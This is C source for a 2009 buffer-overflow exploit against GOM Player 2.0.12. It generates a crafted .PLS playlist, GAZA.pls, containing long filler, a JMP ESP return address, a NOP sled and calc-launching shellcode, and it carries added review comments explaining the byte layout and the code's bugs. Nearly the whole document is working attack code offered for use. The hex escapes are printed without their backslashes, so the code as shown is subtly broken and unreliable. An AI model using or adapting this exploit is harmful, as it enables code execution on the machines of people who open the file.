# Title : GOM Player 2.0.12 (.PLS) Universal Buffer Overflow Exploit
# Published : 2009-01-30
# Author : Stack
/*------------------------------------------------
* GOM Player 2.0.12 (.PLS) Universal Buffer Overflow Exploit
*-------------------------------------------------
* Discovered & Exploited: Mountassif Moad
* http://v4-Team.com & v4 Team & Evil Finger
* Stack(at)hotmail(dot).fr
*
* NOTIFICATION:
* The vulnerability PoC was reported by Parvez Anwar in Secunia http://secunia.com/advisories/23994
* via an (.ASX) file; after that DATA_SNIPER exploited it in http://www.milw0rm.com/exploits/7702
* and this is a new exploit for the (.PLS) file, exploited by Stack; the idea of the exploit was inspired by DATA_SNIPER
* Thnx all friends
*/
#include <stdio.h>
#include <windows.h>
/*
 * Static pieces of the generated .pls file, as hex byte escapes.
 *
 * NOTE(review): in this rendering the backslash of every `\x` escape (and of
 * the `\r\n` in the printf strings below) appears to have been lost, so the
 * literals as printed are plain ASCII "xNN" text, three characters per
 * intended byte. The comments describe the bytes the hex values denote.
 */
/* PLS playlist header, 48 byte values. They decode to
 *   "[playlist]\r\n\r\nNumberOfEntries=1\r\n\r\nFile1=http://"
 * i.e. a one-entry playlist whose File1 URL is the very long value that
 * main() appends after it. A .pls whose File1 is followed by a run of
 * identical bytes this long is the observable signature of this PoC. */
unsigned char Header1[] =
"x5bx70x6cx61x79x6cx69x73x74x5d"
"x0dx0ax0dx0ax4ex75x6dx62x65x72"
"x4fx66x45x6ex74x72x69x65x73x3d"
"x31x0dx0ax0dx0ax46x69x6cx65x31"
"x3dx68x74x74x70x3ax2fx2f";; // stray second ';' is an empty file-scope declaration (non-ISO, some compilers warn)
/* Trailing padding: a run of 0x20 (space) byte values, copied into the file
 * after Shell by the last memcpy in main(). */
unsigned char Header2[] ="x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20";
/* Opaque payload bytes: 144 hex values (nine lines of 15 plus one of 9),
 * described by the author as windows/exec with CMD=calc. Nothing else about
 * them can be established from this listing. */
/*windows/exec - 144 bytes,Encoder: CMD=calc*/
unsigned char Shell[] =
"x31xc9xbdx90xb7x29xb8xd9xf7xd9x74x24xf4xb1x1e"
"x58x31x68x11x03x68x11x83xe8x6cx55xdcx44x64xde"
"x1fxb5x74x54x5ax89xffx16x60x89xfex09xe1x26x18"
"x5dxa9x98x19x8ax1fx52x2dxc7xa1x8ax7cx17x38xfe"
"xfax57x4fxf8xc3x92xbdx07x01xc9x4ax3cxd1x2axb7"
"x36x3cxb9xe8x9cxbfx55x70x56xb3xe2xf6x37xd7xf5"
"xe3x43xfbx7exf2xb8x8axddxd1x3ax4fx82x28xb5x2f"
"x6bx2fxb2xe9xa3x24x84xf9x48x4ax19xacxc4xc3x29"
"x27x22x90xeax5dx83xffx94x79xc1x73x01xe1xf8xfe"
"xdfx46xfax18xbcx09x68x84x43";
/*
 * Entry point: assembles the crafted playlist in `payload` and writes it to
 * "GAZA.pls" in the current directory. argc/argv are not used.
 *
 * File layout, in memcpy order: Header1 (PLS header), filler taken from
 * `junk` (0x41 bytes), RET_Univ, the eight nop bytes, Shell, then Header2.
 * Each destination is recomputed from the sizeof() of the preceding
 * literals; the -1/-2/-3/-4 terms subtract their NUL terminators. With the
 * escapes intact the pieces are contiguous and RET_Univ lands at offset
 * (sizeof(Header1) - 1) + 4171.
 *
 * Review notes:
 *  - `junk` is 4171 bytes but 4172 are copied from it: a one-byte stack
 *    over-read (undefined behaviour). The over-read byte is then overwritten
 *    by RET_Univ, so it never reaches the file.
 *  - `payload` is never initialised and fwrite() emits all 4563 bytes, so any
 *    tail the memcpy chain did not set is whatever was on the stack.
 *  - If compiled exactly as printed (escape backslashes missing) every
 *    literal is about three times longer than its byte count and the memcpy
 *    chain writes past the end of `payload`: the generator corrupts its own
 *    stack before the file is written.
 *  - fwrite() and fclose() results are ignored; the fopen() failure path
 *    prints a message and then returns 0, i.e. reports success.
 *  - memset()/memcpy() are used without <string.h>; presumably reached via
 *    <windows.h> -- verify.
 */
int main( int argc, char **argv ) {
char payload[4563]; // output buffer; uninitialised
char junk[4171]; // filler region, set to 0x41 below
/* Four bytes written over the saved return address. The author labels them a
 * JMP ESP inside GOM.exe (hence "universal"); the author's alternate comment
 * kept below attributes the same bytes to kernel32.dll on XP SP2 (French).
 * The two claims conflict and cannot be resolved from this listing. */
unsigned char RET_Univ[] = "x5Dx38x82x7C"; // JMP ESP in GOM.exe this make it universal
/* Author's alternate note: RET_sp2 FR = "x5Dx38x82x7C", JMP ESP in kernel32.dll XP SP2 fr */
unsigned char nop[] = "x90x90x90x90x90x90x90x90"; // eight 0x90 bytes placed between RET_Univ and Shell
FILE *f;
printf("GOM Player 2.0.12 (.pls) Universal Buffer Overflow Exploitrn");
printf("---------------------------------------------------rn");
memset(junk, 0x41, 4171); // fill with 'A'; length equals sizeof junk
printf("[_] Building Exploit..rn");
memcpy( payload, Header1, sizeof( Header1 ) - 1 ); // PLS header at offset 0
memcpy( payload + sizeof( Header1 ) - 1, junk, 4172 ); // copies one byte past the end of junk
memcpy( payload + sizeof( Header1 ) + sizeof(junk)-1, RET_Univ, 4 ); // overwrites the last filler byte
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(RET_Univ)-2, nop, sizeof(nop)-1 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(nop)+sizeof(RET_Univ)-3, Shell, sizeof( Shell ) - 1 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(RET_Univ)+sizeof(nop)+ sizeof(Shell)-4, Header2, sizeof( Header2 ) - 1 ); // trailing spaces last
f = fopen( "GAZA.pls", "wb" ); // binary mode so no newline translation on Windows
if ( f == NULL ) {
printf("[_] Cannot create filen");
return 0; // NOTE(review): exit status 0 despite the failure
}
fwrite( payload, 1, sizeof(payload) , f ); // whole 4563-byte buffer, including unset bytes; result unchecked
fclose( f ); // result unchecked
printf("[_] GAZA.Pls file Created,Credit: Stack :)rn");
return 0;
}
// www.Syue.com [2009-01-30]